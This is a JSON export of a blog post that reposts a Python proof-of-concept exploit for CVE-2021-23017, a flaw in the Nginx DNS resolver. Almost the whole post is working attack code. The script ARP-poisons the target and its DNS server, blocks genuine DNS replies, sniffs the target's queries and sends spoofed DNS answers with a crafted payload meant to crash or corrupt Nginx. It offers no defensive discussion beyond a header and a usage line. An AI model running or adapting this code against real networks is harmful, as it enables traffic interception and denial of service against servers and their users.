{"id":27073,"date":"2022-07-13T11:40:04","date_gmt":"2022-07-13T07:40:04","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167720\/nginx1200-dos.txt"},"modified":"2022-07-20T08:57:50","modified_gmt":"2022-07-20T04:27:50","slug":"nginx-1-20-0-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/nginx-1-20-0-denial-of-service\/","title":{"rendered":"Nginx 1.20.0 Denial Of Service"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Nginx 1.20.0 &#8211; Denial of Service (DOS)<br \/>\n# Date: 2022-6-29<br \/>\n# Exploit Author: Mohammed Alshehri &#8211; https:\/\/Github.com\/M507<br \/>\n# Vendor Homepage: https:\/\/nginx.org\/<br \/>\n# Software Link: https:\/\/github.com\/nginx\/nginx\/releases\/tag\/release-1.20.0<br \/>\n# Version: 0.6.18 &#8211; 1.20.0<br \/>\n# Tested on: Ubuntu 18.04.4 LTS bionic<br \/>\n# CVE: CVE-2021-23017<br \/>\n# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn<br \/>\n# python3 poc.py &#8211;target 172.1.16.100 &#8211;dns_server 172.1.16.1<br \/>\n# The service needs to be configured to use Nginx resolver<\/p>\n<p dir=\"ltr\">from scapy.all import *<br \/>\nfrom multiprocessing import Process<br \/>\nfrom binascii import hexlify, unhexlify<br \/>\nimport argparse, time, os<\/p>\n<p dir=\"ltr\">def device_setup():<br \/>\nos.system(&#8220;echo &#8216;1&#8217; &gt;&gt; \/proc\/sys\/net\/ipv4\/ip_forward&#8221;)<br \/>\nos.system(&#8220;iptables -A FORWARD -p UDP &#8211;dport 53 -j DROP&#8221;)<\/p>\n<p dir=\"ltr\">def ARPP(target, dns_server):<br \/>\nprint(&#8220;[*] Sending poisoned ARP packets&#8221;)<br \/>\ntarget_mac = getmacbyip(target)<br \/>\ndns_server_mac = getmacbyip(dns_server)<br \/>\nwhile True:<br \/>\ntime.sleep(2)<br \/>\nsend(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)<br \/>\nsend(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)<\/p>\n<p dir=\"ltr\">def exploit(target):<br \/>\nprint(&#8220;[*] Listening &#8220;)<br \/>\nsniff (filter=&#8221;udp and port 53 and host &#8221; + target, prn = process_received_packet)<\/p>\n<p dir=\"ltr\">&#8220;&#8221;&#8221;<br \/>\nRFC schema<br \/>\n0 1 2 3<br \/>\n0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n| LENGTH | ID |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n| ANCOUNT | NSCOUNT |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n| ARCOUNT | QD |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n| AN | NS |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br \/>\n| AR |<br \/>\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<\/p>\n<p dir=\"ltr\">Fig. DNS<\/p>\n<p dir=\"ltr\">&#8220;&#8221;&#8221;<br \/>\ndef process_received_packet(received_packet):<br \/>\nif received_packet[IP].src == target_ip:<br \/>\nif received_packet.haslayer(DNS):<br \/>\nif DNSQR in received_packet:<br \/>\nprint(&#8220;[*] the received packet: &#8221; + str(bytes_hex(received_packet)))<br \/>\nprint(&#8220;[*] the received DNS request: &#8221; + str(bytes_hex(received_packet[DNS].build())))<br \/>\ntry:<br \/>\n# \\\/ the received DNS request<br \/>\ndns_request = received_packet[DNS].build()<br \/>\nnull_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)<br \/>\nprint(&#8220;[*] debug: dns_request[:null_pointer_index] : &#8220;+str(hexlify(dns_request[:null_pointer_index])))<br \/>\nprint(&#8220;[*] debug: dns_request[null_pointer_index:] : &#8220;+str(hexlify(dns_request[null_pointer_index:])))<br \/>\npayload = [<br \/>\ndns_request[0:2],<br \/>\nb&#8221;\\x81\\x80\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x00&#8243;,<br \/>\ndns_request[12:null_pointer_index+1],<br \/>\ndns_request[null_pointer_index+1:null_pointer_index+3],<br \/>\ndns_request[null_pointer_index+3:null_pointer_index+5],<br \/>\nb&#8221;\\xC0\\x0C\\x00\\x05\\x00\\x01\\x00\\x00\\x0E\\x10&#8243;,<br \/>\nb&#8221;\\x00\\x0B\\x18\\x41\\x41\\x41\\x41\\x41\\x41\\x41&#8243;,<br \/>\nb&#8221;\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41&#8243;,<br \/>\nb&#8221;\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\xC0\\x04&#8221;<br \/>\n]\n<p dir=\"ltr\">payload = b&#8221;&#8221;.join(payload)<br \/>\nspoofed_pkt = (Ether()\/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)\/\\<br \/>\nUDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)\/\\<br \/>\npayload)<br \/>\nprint(&#8220;[+] dns answer: &#8220;+str(hexlify(payload)))<br \/>\nprint(&#8220;[+] full packet: &#8221; + str(bytes_hex(spoofed_pkt)))<\/p>\n<p dir=\"ltr\">sendp(spoofed_pkt, count=1)<br \/>\nprint(&#8220;\\n[+] malicious answer was sent&#8221;)<br \/>\nprint(&#8220;[+] exploited\\n&#8221;)<br \/>\nexcept:<br \/>\nprint(&#8220;\\n[-] ERROR&#8221;)<\/p>\n<p dir=\"ltr\">def main():<br \/>\nglobal target_ip<br \/>\nparser = argparse.ArgumentParser()<br \/>\nparser.add_argument(&#8220;-t&#8221;, &#8220;&#8211;target&#8221;, help=&#8221;IP address of the target&#8221;)<br \/>\nparser.add_argument(&#8220;-r&#8221;, &#8220;&#8211;dns_server&#8221;, help=&#8221;IP address of the DNS server used by the target&#8221;)<br \/>\nargs = parser.parse_args()<br \/>\ntarget_ip = args.target<br \/>\ndns_server_ip = args.dns_server<br \/>\ndevice_setup()<br \/>\nprocesses_list = []\nARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))<br \/>\nexploitProcess = Process(target=exploit,args=(target_ip,))<br \/>\nprocesses_list.append(ARPPProcess)<br \/>\nprocesses_list.append(exploitProcess)<br \/>\nfor process in processes_list:<br \/>\nprocess.start()<br \/>\nfor process in processes_list:<br \/>\nprocess.join()<\/p>\n<p dir=\"ltr\">if __name__ == &#8216;__main__&#8217;:<br \/>\ntarget_ip = &#8220;&#8221;<br \/>\nmain()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Nginx 1.20.0 &#8211; Denial of Service (DOS) # Date: 2022-6-29 # Exploit Author: Mohammed Alshehri &#8211; https:\/\/Github.com\/M507 # Vendor Homepage: https:\/\/nginx.org\/ # Software Link: https:\/\/github.com\/nginx\/nginx\/releases\/tag\/release-1.20.0 # Version: 0.6.18 &#8211; 1.20.0 # Tested on: Ubuntu 18.04.4 LTS bionic # CVE: CVE-2021-23017 # The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27073","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27073","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27073"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27073\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27073"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27073"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27073"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}